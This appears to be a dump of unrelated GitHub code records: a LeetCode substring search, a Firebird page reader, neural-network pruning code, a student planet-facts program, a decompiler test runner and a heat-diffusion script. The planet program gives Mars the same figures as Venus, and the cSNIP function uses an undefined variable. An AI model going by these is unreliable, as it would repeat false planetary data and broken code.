hash_to_idx[hash].append(i)\r\n return \"\"\r\n\r\n max_possible_len, min_impossble_len = 0, len(S)\r\n result = \"\"\r\n while min_impossble_len - max_possible_len > 1:\r\n length_in_middle = (max_possible_len + min_impossble_len) // 2\r\n substr = obtain_dup_substring(S, length_in_middle)\r\n if substr:\r\n result = substr\r\n max_possible_len = length_in_middle\r\n else:\r\n min_impossble_len = length_in_middle\r\n return result","repo_name":"Gangadharbhuvan/30_Days_Leetcode_Challenge-June-","sub_path":"Day-19_Longest_Subset_Substring.py","file_name":"Day-19_Longest_Subset_Substring.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} {"seq_id":"2670418074","text":"# -*- coding: utf-8 -*-\nimport struct\nfrom collections import namedtuple\n\n\nclass TableReader(object):\n '''Abstract class for table reading\n Need to define:\n TABLE_NAME\n or RELATION_ID if table RDB$RELATION not read yet\n or PAGE_NUMBER to read RDB$PAGES\n '''\n TABLE_NAME = None\n RELATION_ID = None\n PAGE_NUMBER = None\n\n def __init__(self, db_reader):\n assert self.TABLE_NAME or self.RELATION_ID or self.PAGE_NUMBER\n self.db_reader = db_reader\n\n def _find_relation(self):\n relation_list = list(filter(lambda x: x.p_relation_name == self.TABLE_NAME, self.db_reader.relations))\n assert len(relation_list) == 1\n return relation_list[0]\n\n def _find_pointer_page(self, relation_id):\n pages = list(filter(lambda x: x.p_relation_id == relation_id, self.db_reader.pages_table))\n pages_pointer = list(filter(lambda x: x.p_page_type == 4, pages))\n assert len(list(pages_pointer)) == 1\n return pages_pointer[0]\n\n def get_rows(self):\n if self.TABLE_NAME:\n relation = self._find_relation()\n pointer_page = self._find_pointer_page(relation.p_relation_id)\n ppage = self.db_reader.read_page(pointer_page.p_page_number)\n\n if self.RELATION_ID:\n pointer_page = self._find_pointer_page(self.RELATION_ID)\n ppage = 
self.db_reader.read_page(pointer_page.p_page_number)\n\n if self.PAGE_NUMBER:\n ppage = self.db_reader.read_page(self.PAGE_NUMBER)\n\n page_list = [ppage]\n while ppage.ppg_next != 0:\n ppage = self.db_reader.read_page(ppage.ppg_next)\n page_list.append(ppage)\n\n for ppage in page_list:\n for page in ppage.ppg_page:\n if page['address'] == 0:\n # Free page\n continue\n data_page = self.db_reader.read_page(page['address'])\n assert data_page.header.pag_type == 5, 'must links to Data Pages'\n\n # Check bit parser in bitmap\n # TODO DEBUG\n # if data_page.header.pag_flags & 0b10:\n # assert page['full'] == 1\n # else:\n # assert page['full'] == 0\n if data_page.header.pag_flags & 0b100:\n assert page['has_large_obj'] == 1\n else:\n assert page['has_large_obj'] == 0\n\n for pages_row in data_page.dpg_rpt:\n if pages_row.rhd_blob or \\\n pages_row.rhd_stream_blob_or_rhd_delta:\n continue\n\n if pages_row.rhd_incomplete:\n continue\n\n data = pages_row.data_uncompressed\n if pages_row.rhd_fragment:\n continue\n\n # while pages_row.rhd_fragment:\n # _p = self.db_reader.read_page(pages_row.rhdf_f_page)\n # print(pages_row.rhdf_f_page, pages_row.rhdf_f_line)\n # pages_row = _p.dpg_rpt[pages_row.rhdf_f_line]\n # print(data)\n # data += pages_row.data_uncompressed\n # print(data)\n # print()\n # # exit(0)\n\n # TODO: know why data is empty\n if not data:\n continue\n # HACK, becose sometimes we cant parse row and return Null\n row = self.parse_row_data(data)\n if row:\n yield row\n\n def parse_row_data(self, data):\n raise NotImplementedError()\n\n\nclass Table_RdbPages(TableReader):\n '''List all pages in database file. page_number of first page can get from db_header'''\n def __init__(self, db_reader, **kwargs):\n self.PAGE_NUMBER = db_reader.db_header.hdr_PAGES\n super().__init__(db_reader, **kwargs)\n\n def parse_row_data(self, data):\n p_unknown, p_page_number, p_relation_id, p_page_seq, p_page_type = struct.unpack_from(' 0)\n return diff_num\n\n\ndef get_pretrain_pruned_unet(opts, in_model, origin_model, channel_mask, verbose=False):\n Print(\"Copy pretrained weights...\", color=\"g\")\n if isinstance(channel_mask[0], torch.Tensor):\n channel_mask = [c.cpu().numpy().tolist() for c in channel_mask]\n elif isinstance(channel_mask[0], np.ndarray):\n channel_mask = [c.tolist() for c in channel_mask]\n\n new_model = copy.deepcopy(in_model)\n\n Print(\"Input chs:\", [len(c) for c in channel_mask], color=\"y\")\n\n layer_idx = 0\n start_mask, end_mask = [1], channel_mask[layer_idx]\n unet_concat_config = {15: 1, 12: 3, 9: 5}\n prev_masks = {}\n for i, (m0, m1) in enumerate(\n zip(origin_model.modules(), new_model.modules())\n ): # conv->bn order\n keep_prev_mask = True if layer_idx in unet_concat_config.values() else False\n restore_prev_mask = True if layer_idx in unet_concat_config.keys() else False\n\n if isinstance(m0, nn.BatchNorm3d):\n idx1 = np.squeeze(np.argwhere(end_mask))\n if idx1.size == 1:\n idx1 = np.resize(idx1, (1,))\n Print(\n \" Batch3D channel:\", len(end_mask), \"m0 w-shape:\", m0.weight.data.shape\n )\n assert (\n m1.weight.data.shape == m0.weight.data[idx1.tolist()].shape\n ), \"Dim mismatch {}!={}\".format(\n m1.weight.data.shape, m0.weight.data[idx1.tolist()].shape\n )\n assert (\n m1.bias.data.shape == m0.bias.data[idx1.tolist()].shape\n ), \"Dim mismatch {}!={}\".format(\n m1.bias.data.shape, m0.bias.data[idx1.tolist()].shape\n )\n\n m1.weight.data = m0.weight.data[idx1.tolist()].clone()\n m1.bias.data = m0.bias.data[idx1.tolist()].clone()\n m1.num_batches_tracked = 
m0.num_batches_tracked.clone()\n m1.running_mean = m0.running_mean[idx1.tolist()].clone()\n m1.running_var = m0.running_var[idx1.tolist()].clone()\n layer_idx += 1\n start_mask = end_mask.copy()\n if layer_idx < len(channel_mask): # do not change in Final FC\n end_mask = channel_mask[layer_idx]\n elif isinstance(m0, PrunableWeights):\n if keep_prev_mask:\n prev_masks[layer_idx] = [start_mask, end_mask]\n\n if restore_prev_mask:\n old_mask = prev_masks[unet_concat_config[layer_idx]]\n start_mask = np.concatenate((np.array(old_mask[1]), start_mask))\n Print(\n \"Restore prev {}th to {}th: {} -> {}:\".format(\n unet_concat_config[layer_idx],\n layer_idx,\n len(old_mask[1]),\n len(start_mask),\n ),\n color=\"y\",\n verbose=verbose,\n )\n assert (\n len(start_mask) == m0.weight.data.shape[1]\n and len(end_mask) == m0.weight.data.shape[0]\n ), \"Channel mismatch at {}-{},{}-{}\".format(\n len(start_mask),\n m0.weight.data.shape[1],\n len(end_mask),\n m0.weight.data.shape[0],\n )\n\n if isinstance(m0, PrunableConv3d):\n idx0 = np.squeeze(np.argwhere(start_mask))\n idx1 = np.squeeze(np.argwhere(end_mask))\n else:\n idx1 = np.squeeze(np.argwhere(start_mask))\n idx0 = np.squeeze(np.argwhere(end_mask))\n\n Print(\n \"OriLayer {}:{}\\n In channel: {:d}->{:d}, Out channel {:d}->{:d}\\n\".format(\n layer_idx, m0, len(start_mask), idx0.size, len(end_mask), idx1.size\n ),\n color=\"g\",\n verbose=verbose,\n )\n\n if idx0.size == 1:\n idx0 = np.resize(idx0, (1,))\n if idx1.size == 1:\n idx1 = np.resize(idx1, (1,))\n w1 = m0.weight.data[:, idx0.tolist(), ...].clone()\n w1 = w1[idx1.tolist(), ...].clone()\n\n assert (\n m1.weight.data.shape == w1.shape\n ), \"Weight dim mismatch {}!={}\".format(m1.weight.data.shape, w1.shape)\n m1.weight.data = w1.clone()\n\n if isinstance(m0, PrunableDeconv3d):\n idx1 = idx0\n\n assert (\n m1.bias.data.shape == m0.bias.data[idx1.tolist()].shape\n ), \"Bias dim mismatch {}!={}\".format(\n m1.bias.data.shape, m0.bias.data[idx1.tolist()].shape\n )\n m1.bias.data = m0.bias.data[idx1.tolist()].clone()\n\n if isinstance(m0, PrunableDeconv3d):\n layer_idx += 1\n start_mask = end_mask.copy()\n if layer_idx < len(channel_mask):\n end_mask = channel_mask[layer_idx]\n elif isinstance(m0, nn.Conv3d): # last classify conv\n idx0 = np.squeeze(np.argwhere(start_mask))\n w1 = m0.weight.data[:, idx0.tolist(), ...].clone()\n assert (\n m1.weight.data.shape == w1.shape\n ), \"Weight dim mismatch {}!={}\".format(m1.weight.data.shape, w1.shape)\n m1.weight.data = w1.clone()\n m1.bias.data = m0.bias.data.clone()\n\n return new_model\n\n\ndef SNIP(\n input_net,\n prepare_batch_fn,\n loss_fn,\n keep_ratio,\n train_dataloader,\n device=\"cpu\",\n output_dir=None,\n):\n # TODO: shuffle?\n # Grab a single batch from the training dataset\n batchdata = next(iter(train_dataloader))\n batch = prepare_batch_fn(batchdata, device, False)\n if len(batch) == 2:\n inputs, targets = batch\n else:\n raise NotImplementedError\n\n if isinstance(inputs, (tuple, list)): # multiple inputs\n spatial_ndim = inputs[0].ndim - 2\n else:\n spatial_ndim = inputs.ndim - 2 # assume inputs dim [BCHWD]or[BCHW]\n if spatial_ndim not in [2, 3]:\n raise ValueError(\n f\"Currently only support 2&3D data, but got dim={spatial_ndim}\"\n )\n\n # Let's create a fresh copy of the network so that we're not worried about\n # affecting the actual training-phase\n net = copy.deepcopy(input_net).to(device)\n\n # Monkey-patch the Linear and Conv2d layer to learn the multiplicative mask\n # instead of the weights\n for layer in 
net.modules():\n if isinstance(layer, PrunableWeights):\n layer.weight_mask = nn.Parameter(torch.ones_like(layer.weight))\n nn.init.xavier_normal_(layer.weight)\n layer.weight.requires_grad = False\n\n if spatial_ndim == 3:\n snip_conv_forward = snip_forward_conv3d\n snip_deconv_forward = snip_forward_deconv3d\n elif spatial_ndim == 2:\n snip_conv_forward = snip_forward_conv2d\n snip_deconv_forward = snip_forward_deconv2d\n\n # Override the forward methods:\n if isinstance(layer, (PrunableConv3d, PrunableConv2d)):\n layer.forward = types.MethodType(snip_conv_forward, layer)\n\n if isinstance(layer, (PrunableDeconv3d, PrunableDeconv2d)):\n layer.forward = types.MethodType(snip_deconv_forward, layer)\n\n if isinstance(layer, PrunableLinear):\n layer.forward = types.MethodType(snip_forward_linear, layer)\n\n # Compute gradients (but don't apply them)\n net.zero_grad()\n outputs = net.forward(inputs)\n if outputs.shape != targets.shape and 1 in outputs.shape:\n outputs.squeeze_()\n loss = loss_fn(outputs, targets)\n loss.backward()\n\n grads_abs = []\n for layer in net.modules():\n if isinstance(layer, PrunableWeights):\n # Print('Layer:', layer, 'weight shape:', layer.weight_mask.shape, color='r')\n grads_abs.append(torch.abs(layer.weight_mask.grad))\n # if isinstance(layer, nn.BatchNorm3d):\n # Print('BN:', layer, 'bn shape:', layer.weight.shape, color='y')\n assert len(grads_abs) != 0, \"No prunable layer defined in the network\"\n\n # Gather all scores in a single vector and normalise\n all_scores = torch.cat([torch.flatten(x) for x in grads_abs])\n norm_factor = torch.sum(all_scores)\n all_scores.div_(norm_factor)\n\n if keep_ratio > 0:\n num_params_to_keep = int(len(all_scores) * keep_ratio)\n threshold, _ = torch.topk(all_scores, num_params_to_keep, sorted=True)\n acceptable_score = threshold[-1]\n else:\n acceptable_score = np.mean(all_scores)\n\n keep_masks = []\n for g in grads_abs:\n msk = (g / norm_factor) >= acceptable_score\n if msk.any():\n keep_masks.append(msk.float())\n else:\n onehot = torch.zeros(len(msk))\n keep_masks.append(onehot.scatter_(0, torch.argmax(g), 1).float())\n\n # print(torch.sum(torch.cat([torch.flatten(x == 1) for x in keep_masks])))\n Print(\n \"Scores min:\",\n torch.min(all_scores),\n \"Scores max:\",\n torch.max(all_scores),\n \"Scores mean:\",\n torch.mean(all_scores),\n color=\"y\",\n )\n Print(\n \"Keep_masks ratio:\",\n [\n f\"{np.count_nonzero(m.cpu().numpy())/m.cpu().numpy().size:0.2f}\"\n for m in keep_masks\n ],\n color=\"y\",\n )\n if output_dir and os.path.isdir(output_dir):\n np.save(\n os.path.join(\n output_dir, \"snip_w_scores_{}.npy\".format(time.strftime(\"%H%M\"))\n ),\n all_scores.cpu().numpy(),\n )\n\n return keep_masks\n\n\ndef cSNIP(\n input_net,\n loss_fn,\n keep_ratio,\n train_dataloader,\n min_chs=3,\n use_cuda=True,\n output_dir=None,\n):\n # TODO: shuffle?\n\n # Grab a single batch from the training dataset\n inputs, targets = next(iter(train_dataloader))\n\n # Let's create a fresh copy of the network so that we're not worried about\n # affecting the actual training-phase\n net = copy.deepcopy(input_net)\n\n if use_cuda:\n inputs = inputs.cuda()\n targets = targets.cuda()\n net = net.cuda()\n\n # Monkey-patch the Linear and Conv2d layer to learn the multiplicative mask\n # instead of the weights\n for layer in net.modules():\n if isinstance(layer, (PrunableConv3d, PrunableConv2d)):\n # Print('Layer w dim:', layer.weight.shape, color='y')\n layer.weight_mask = (\n nn.Parameter(torch.ones([layer.weight.shape[0], 1, 1, 1, 
1]).cuda())\n if use_cuda\n else nn.Parameter(torch.ones([layer.weight.shape[0], 1, 1, 1, 1]))\n )\n nn.init.xavier_normal_(layer.weight)\n layer.weight.requires_grad = False\n elif isinstance(layer, (PrunableDeconv3d, PrunableDeconv2d)):\n layer.weight_mask = (\n nn.Parameter(torch.ones([1, layer.weight.shape[1], 1, 1, 1]).cuda())\n if use_cuda\n else nn.Parameter(torch.ones([1, layer.weight.shape[1], 1, 1, 1]))\n )\n nn.init.xavier_normal_(layer.weight)\n layer.weight.requires_grad = False\n\n if spatial_ndim == 3:\n snip_conv_forward = snip_forward_conv3d\n snip_deconv_forward = snip_forward_deconv3d\n elif spatial_ndim == 2:\n snip_conv_forward = snip_forward_conv2d\n snip_deconv_forward = snip_forward_deconv2d\n\n # Override the forward methods:\n if isinstance(layer, (PrunableConv3d, PrunableConv2d)):\n layer.forward = types.MethodType(snip_forward_conv3d, layer)\n\n if isinstance(layer, (PrunableDeconv3d, PrunableDeconv2d)):\n layer.forward = types.MethodType(snip_forward_deconv3d, layer)\n\n # Compute gradients (but don't apply them)\n net.zero_grad()\n outputs = net.forward(inputs)\n loss = loss_fn(outputs, targets)\n loss.backward()\n\n grads_abs, idx = [], []\n for i, layer in enumerate(net.modules()):\n if isinstance(layer, PrunableWeights):\n grads_abs.append(torch.abs(torch.squeeze(layer.weight_mask.grad)))\n idx.append(i)\n # Print('Layer:', layer, 'weight shape:', layer.weight.shape, color='r')\n # if isinstance(layer, nn.BatchNorm3d):\n # Print('BN:', layer, 'bn shape:', layer.weight.shape, color='g')\n\n # Gather all scores in a single vector and normalise\n all_scores = torch.cat([torch.flatten(x) for x in grads_abs])\n norm_factor = torch.sum(all_scores)\n all_scores.div_(norm_factor)\n Print(\n \"Scores min:\",\n torch.min(all_scores),\n \"Scores max:\",\n torch.max(all_scores),\n \"Scores mean:\",\n torch.mean(all_scores),\n color=\"y\",\n )\n if output_dir and os.path.isdir(output_dir):\n with open(os.path.join(output_dir, \"snip_chs_scores.json\"), \"w\") as f:\n json.dump(all_scores.cpu().numpy().tolist(), f)\n\n if keep_ratio > 0:\n num_params_to_keep = int(len(all_scores) * keep_ratio)\n threshold, _ = torch.topk(all_scores, num_params_to_keep, sorted=True)\n acceptable_score = threshold[-1]\n else:\n acceptable_score = np.mean(all_scores)\n\n keep_masks = []\n for i, g in enumerate(grads_abs):\n if 1 < i < len(grads_abs) - 1:\n msk = (g / norm_factor) >= acceptable_score\n if torch.sum(msk) >= min_chs:\n keep_masks.append(msk.cpu().float())\n else:\n ids = torch.topk(g, k=min_chs)[1]\n keep_masks.append(torch.zeros(len(g)).scatter_(0, ids.cpu(), 1))\n else: # keep last conv channel num\n msk = torch.ones(len(g))\n keep_masks.append(msk)\n\n if output_dir and os.path.isdir(output_dir):\n out_mask = [m.numpy().tolist() for m in keep_masks]\n with open(\n os.path.join(output_dir, \"snip_ch_mask_{}.json\".format(keep_ratio)), \"w\"\n ) as f:\n json.dump(out_mask, f)\n\n remains = torch.sum(torch.cat([torch.flatten(x == 1) for x in keep_masks]))\n Print(\"Remain #{} channels\".format(remains), color=\"g\")\n\n return keep_masks\n","repo_name":"Project-Strix/Strix","sub_path":"strix/models/cnn/layers/snip.py","file_name":"snip.py","file_ext":"py","file_size_in_byte":16302,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"51"} +{"seq_id":"16535552244","text":"\"\"\"\n'Solar Search' VERSION 2.0\nAuthor: Lucas Purcell\n(COP 1500 Integration Project)\n This program will provide information about the planets in our solar 
system.\n\"\"\"\n\nprint(\"Hello! Welcome to Solar Search! In this program, you will type the name of a planet,\\n\"\n \"and information about that planet will be shown!\")\n\nwhile True:\n try:\n user_age = int(input(\"Please enter your age: \"))\n except ValueError:\n print(\"Sorry, your age must be a whole number\\n\"\n \"Please try again.\")\n continue\n if user_age < 1:\n print(\"Sorry, your age must be positive.\\n\"\n \"Please try again.\")\n continue\n else:\n user_age = str(user_age)\n break\n\nwhile True:\n try:\n user_name = input(\"Please enter your name: \")\n except ValueError:\n print(\"Sorry, your name can't be a number.\\n\"\n \"Please try again.\")\n continue\n else:\n user_name = str(user_name)\n break\n\nprint(\"Hello, \" + user_name.capitalize() + \"! \" + user_age + \" is the perfect age to learn about \"\n \"the planets in our solar system!\")\n\n\ndef display_planet_data(name, dist, temp, orbit, grav, diam, mass):\n \"\"\"Creates a display of information that correlates\n to the selected planet (name).\"\"\"\n print(\"Name: \" + name)\n print(\"Distance from the sun: \" + dist)\n print(\"Temperature range: \" + temp)\n print(\"Orbital period: \" + orbit)\n print(\"Equatorial surface gravity(Earth = 1): \" + grav)\n print(\"Mean diameter: \" + diam)\n print(\"Mass(Earth = 1): \" + mass)\n\n\nprint(\"Please choose from the list below to learn about that planet. \\n\")\n\n\n# list of planets to show the user their options\nplanets = ['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn', 'Uranus', 'Neptune', 'Pluto\\n']\n\n# formats planet names into a numbered list\nfor index, value in enumerate(planets, 1):\n print(\"{}. {}\".format(index, value))\n\n\ndef mercury():\n display_planet_data(name='Mercury', dist='0.39', temp='-180ºC to 430ºC', orbit='0.24 Earth Years', grav='0.38',\n diam='4,878km', mass='0.055')\n\n\ndef venus():\n display_planet_data(name='Venus', dist='0.72', temp='465ºC', orbit='0.62 Earth Years', grav='0.9', diam='12,104km',\n mass='0.815')\n\n\ndef earth():\n display_planet_data(name='Earth', dist='1', temp='-89ºC to 58ºC', orbit='1 Earth Year', grav='1', diam='12,756km',\n mass='1')\n\n\ndef mars():\n display_planet_data(name='Mars', dist='0.72', temp='465ºC', orbit='0.62 Earth Years', grav='0.9', diam='12,104km',\n mass='0.815')\n\n\ndef jupiter():\n display_planet_data(name='Jupiter', dist='5.20', temp='-150ºC', orbit='11.86 Earth Years', grav='2.64',\n diam='142,800km', mass='318')\n\n\ndef saturn():\n display_planet_data(name='Saturn', dist='9.54', temp='-170ºC', orbit='29.46 Earth Years', grav='0.93',\n diam='120,000km', mass='95')\n\n\ndef uranus():\n display_planet_data(name='Uranus', dist='19.18', temp='-200ºC', orbit='84.01 Earth Years', grav='0.89',\n diam='51,118km', mass='15')\n\n\ndef neptune():\n display_planet_data(name='Neptune', dist='30.06', temp='-210ºC', orbit='164.8 Earth Years', grav='1.12',\n diam='49,528km', mass='17')\n\n\ndef pluto():\n display_planet_data(name='Pluto', dist='39.44', temp='-220ºC', orbit='247.7 Earth Years', grav='0.06',\n diam='2,300km', mass='0.002')\n\n\ndef rerun():\n while True:\n run_choice = input(\n 'Would you like to learn about a different planet?: ') # maybe include an is.upper command after this line\n run_choice = run_choice.upper()\n if run_choice == 'YES':\n break\n elif run_choice == 'NO':\n print(\"Thanks for using Solar Search!\")\n print(\"Goodbye!\")\n print(\"<<< PROGRAM TERMINATED >>>\")\n quit()\n else:\n print(\"Invalid Input\")\n print(\"Please try again!\")\n\n\ndef main():\n 
\"\"\"Calls the appropriate function for each planet that is requested\n by the user. If the user would like to view another planet, they are asked which planet.\"\"\"\n while True:\n user_input = input(str('Type planet here: '))\n user_input = user_input.lower()\n if user_input == 'mercury':\n mercury()\n rerun()\n elif user_input == 'venus':\n venus()\n rerun()\n elif user_input == 'earth':\n earth()\n rerun()\n elif user_input == 'mars':\n mars()\n rerun()\n elif user_input == 'jupiter':\n jupiter()\n rerun()\n elif user_input == 'saturn':\n saturn()\n rerun()\n elif user_input == 'uranus':\n uranus()\n rerun()\n elif user_input == 'neptune':\n neptune()\n rerun()\n elif user_input == 'pluto':\n pluto()\n rerun()\n else:\n print('please check your spelling and try again')\n\n\nmain()\n\n\"\"\"\nCITATIONS:\nPlanet Data:\n https://www.windows2universe.org/our_solar_system/planets_table.html\n https://www.universetoday.com/33415/interesting-facts-about-the-planets/\n https://mars.nasa.gov/all-about-mars/facts/\n https://www.universetoday.com/15182/interesting-facts-about-jupiter/\n https://theplanets.org/the-sun/\nPython Help:\n https://docs.python.org/3/library/time.html\n https://www.w3schools.com/python/python_try_except.asp\n https://www.programiz.com/python-programming/break-continue\n\"\"\"\n","repo_name":"lukecpurcell/Solar-Search","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41337373883","text":"#!/usr/bin/env python\n# Boomerang test functional test runner\n# ARGV[0] test_executable\n# ARGV[1] platform\n# ARGV[2] test\n# ARGV[3] test-set\n# ARGV[4] options\n# ARGV[5] parameters to the recompiled executable\n\nimport os\nimport subprocess\nimport shutil\nimport sys\nimport time\nimport operator\nfrom collections import defaultdict\n\nTESTS_DIR=\".\"+os.sep+\"tests\"\nTEST_INPUT=os.path.join(TESTS_DIR,\"inputs\")\n\nprint(\"Regression tester 0.0.1\\n\")\nFAILED_COMMANDLINES=\"\"\ndef perform_test(exepath,test_file,output_path,args):\n log_name = output_path\n file_size = os.path.getsize(test_file)\n upper_dir = os.sep.join(output_path.split(os.sep)[:-1])\n cmdline = ['-P',os.getcwd(),'-o',upper_dir] + args + [test_file]\n test_stdout = open(log_name+\".stdout\", \"w\")\n test_stderr = open(log_name+\".stderr\", \"w\")\n start_t = time.time()\n result = subprocess.call([exepath]+cmdline, stdout=test_stdout, stderr=test_stderr)\n end_t = time.time()\n test_stdout.close()\n test_stdout.close()\n sys.stdout.write('.' 
if result == 0 else '!')\n return [result == 0, ' '.join(cmdline), test_file, float(file_size)/(end_t-start_t)]\n\nif os.path.isdir(os.path.join(TESTS_DIR,\"outputs_prev\")):\n shutil.rmtree(os.path.join(TESTS_DIR,\"outputs_prev\"))\n\nif os.path.isdir(os.path.join(TESTS_DIR,\"outputs\")):\n shutil.move(os.path.join(TESTS_DIR,\"outputs\"),os.path.join(TESTS_DIR,\"outputs_prev\"))\n\n#exit(1)\n#sh -c \"./boomerang -o functest $4 test/$1/$2 2>/dev/null >/dev/null\"\ncrashes = defaultdict(list)\ntimes = {}\n\ndef test_all_inputs_in(base_dir, dirname=\"\"):\n if dirname != \"\":\n sys.stdout.write(\"\\nTesting in \" + os.path.join(base_dir,\"inputs\",dirname))\n current_dir = os.path.join(base_dir, dirname)\n input_dir = os.path.join(base_dir, \"inputs\", dirname)\n output_dir = os.path.join(base_dir, \"outputs\", dirname)\n machine = \"\"\n if dirname != \"\":\n machine = dirname.split(os.sep)[0] # assumption here is that inputs are always in /inputs/\n for f in os.listdir(input_dir):\n source = os.path.join(base_dir, \"inputs\", dirname, f)\n if os.path.isdir(source):\n test_all_inputs_in(base_dir,os.path.join(dirname,f)) # recurse\n else:\n test_path = source\n result_path = os.path.join(base_dir,\"outputs\",dirname,f)\n try:\n os.makedirs(result_path)\n except OSError:\n pass\n test_res = perform_test(sys.argv[1],source,result_path,sys.argv[2:])\n assert(not test_res[0] or os.path.isfile(os.path.join(output_dir,\"log\")))\n try:\n shutil.move(os.path.join(output_dir,\"log\"),os.path.join(output_dir,f+\".log\"))\n except (OSError, shutil.Error):\n pass\n\n if not test_res[0]:\n crashes[machine].append([source,test_res[1]])\n elif test_res[3] is not None:\n times[test_res[2]] = test_res[3]\n\ntest_all_inputs_in(TESTS_DIR)\nfor machine, crash_list in crashes.items():\n print(\"\\nEncountered \"+str(len(crash_list))+\" program failures for \"+machine)\n for test in crash_list:\n print(\"Decompiler failed on \"+test[0]+\" - \"+str(test[1]))\n\nsorted_times = sorted(times.items(), key=operator.itemgetter(1), reverse=True)\nprint(\"Slowest run: \"+sorted_times[0][0]+\" - \"+str(sorted_times[0][1])+\" bytes/sec\")\n\n#Dir.open(TESTS_DIR+\"/inputs\").each() {|f|\n# next if f==\".\" or f==\"..\"\n# FileUtils.mv(TESTS_DIR+\"/inputs/\"+f,TESTS_DIR+\"/outputs/\"+f) if f.end_with?(\".b\")\n#}\n#puts \"**************************************\\n\"\n","repo_name":"hakusdream/boomerang","sub_path":"regression_tester.py","file_name":"regression_tester.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"29207878701","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport os\nimport subprocess\nplt.rc('text', usetex=True)\nfrom mpi4py import MPI\nimport sys \n\n\ndef get_grid(mx, my, mz, Lx,Ly,Lz):\n #print('mx,my,mz = ',mx,my,mz)\n ix, iy, iz = Lx*np.linspace(0,1,mx), Ly*np.linspace(0,1,my), Lz*np.linspace(0,1,mz)\n x, y, z = np.meshgrid(ix,iy,iz, indexing='ij')\n #print('ix', ix), print('iy', iy), print('iz', iz)\n return x,y,z\n\ndef plot_grid(x,y,z,T, t, filename):\n def plot_boundary_only(x,y,z,T):\n #mx, my, mz = x.shape\n x[1:-1, 1:-1, 1:-1],y[1:-1, 1:-1, 1:-1],z[1:-1, 1:-1, 1:-1],T[1:-1, 1:-1, 1:-1] = np.nan, np.nan, np.nan, np.nan \\\n #This removes the interior because we cannot see it anyway; 
reduces time to plot\n return x,y,z,T\n \n x,y,z,T = plot_boundary_only(x,y,z,T)\n fig = plt.figure(figsize=(15,15), facecolor = 'w')\n ax = fig.add_subplot(111, projection='3d')\n img = ax.scatter(x,y,z, c=T.reshape(-1), s=150, vmin = -2.5, vmax = 23, cmap='inferno')\n cbar = fig.colorbar(img, orientation='horizontal', fraction=0.047, pad=0.15, aspect=15)\n plt.tick_params(axis='both', which='major', labelsize=18)\n cbar.ax.tick_params(labelsize=20)\n cbar.set_label(r'Temperature ($^oC$)', size = 22)\n \n ax.text(0,0,-15, 't = %i days'%t, fontsize=20)\n ax.set_xticklabels(['%i'%(l*W/Nw) for l in ax.get_xticks()])\n ax.set_yticklabels(['%i'%(l*L/Nl/1e3) for l in ax.get_yticks()])\n ax.set_zticklabels(['%i'%(l*D/Nd) for l in ax.get_zticks()])\n ax.set_ylabel('Y (km)', labelpad=20, fontsize=20)\n ax.set_xlabel('X (m)', labelpad=20, rotation=0, fontsize=20)\n ax.set_zlabel('Depth from surface (m)', rotation=0, fontsize=20)\n ax.invert_zaxis()\n ax.view_init(15, -20)\n #plt.tight_layout()\n #plt.savefig('tempevolution_plots/temp%s.png'%count)\n plt.savefig(filename, bbox_inches='tight')\n #plt.show()\n\n\ndef init_T(x,y,z, T_3d):\n #print('size of y = ', np.shape(y))\n T = T_3d\n #print('Size of T = ',np.shape(T))\n return T\n\ndef show_plot(crust, t):\n fig, ax = plt.subplots(1,1, figsize=(5,4))\n im = ax.imshow(crust, vmin=0, vmax=20, cmap = 'inferno', aspect = 1 * (Nw/Nd))\n cbar = fig.colorbar(im, ax=ax)\n cbar.set_label('$\\\mathrm{Temperature\\\ [^oC]}$', rotation=270, labelpad=15)\n ax.set_title('$\\\mathrm{t = %i\\\ days}$'%t)\n ax.set_xlabel('$\\\mathrm{Width}$')\n ax.set_ylabel('$\\\mathrm{Depth}$')\n\n\ncomm = MPI.COMM_WORLD\nNtasks = comm.Get_size()\nThisTask = comm.Get_rank()\n\n\n# Constants (currently set for Earth vals)\n\nTinit = 10 # C\nTvar = 12 # C\nTbottom = 11 # C\n\n# Diffusion constant (https://www.nature.com/articles/nature07818)\nalpha = 0.0864 # m^2 / day\n#alpha = 0.389 #m^2 / day (https://terra-docs.s3.us-east-2.amazonaws.com/IJHSR/Articles/volume4-issue3/2022_43_p17_Murgia.pdf)\n\n# times\ntyear = 11.2 # days in a year of proxima b\nti = 0 # d\ntf = 1*tyear # d\ndt = 0.1 # d\n\nTemp_day = 7 #C\ntday = 1 #day\n\n# Depth, width, length (need to keep dt < a**2/(2*alpha))\nD = 10 # m\nNd = 40\nW = 50 # m\nNw = 50\nL = 4e6 # m\nNl = 100\nad = D/Nd\nal = L/Nl\n\n\n#We will be dividing the 2D array column-wise among the tasks\n\nindex_high = int(((ThisTask + 1) * Nl) / Ntasks) #setting upper bound of column no for each task\nindex_low = int((ThisTask * Nl) / Ntasks) #setting lower bound of column no for each task\ndel_index = int(Nl / Ntasks) #For now please provide Ntasks such that del_index is automatically int\n#print('del_index = {}'.format(del_index))\n#sys.stdout.flush()\n\n\n# Read in flare info from Vida+2019\nenergy = np.genfromtxt('vida+2019_flares.txt', usecols=3, skip_header=2)\nelen = len(energy)\n# Probability of a flare occurring in dt = number of flares / number of dt in 50 days \nflare_prob = elen / (50/dt)\n\n# energy = np.append(energy, 1e34)\n\n# Ergs in a given dt:\npcen_energy = 6.03e30 * 24*60*60 * dt\nflare_factor = 4.8*energy / pcen_energy * (Tinit+Tvar+Temp_day)\n\n\ncrust = np.full((Nd,Nl), Tinit, dtype='float')\n#crust = np.ones((Nd,Nl), dtype = 'float') * Tinit\ncrust[Nd-1] = Tbottom\n\n#initializing the cells\ncell_left = np.zeros(1)\ncell_right = np.zeros(1)\n#cell_upper = np.zeros(1)\n#cell_lower = np.zeros(1)\n\n\ncount = 0 #for plotting\n\nif ( (dt*alpha/ad**2 > 0.5) or (dt*alpha/al**2 > 0.5)):\n dt = 
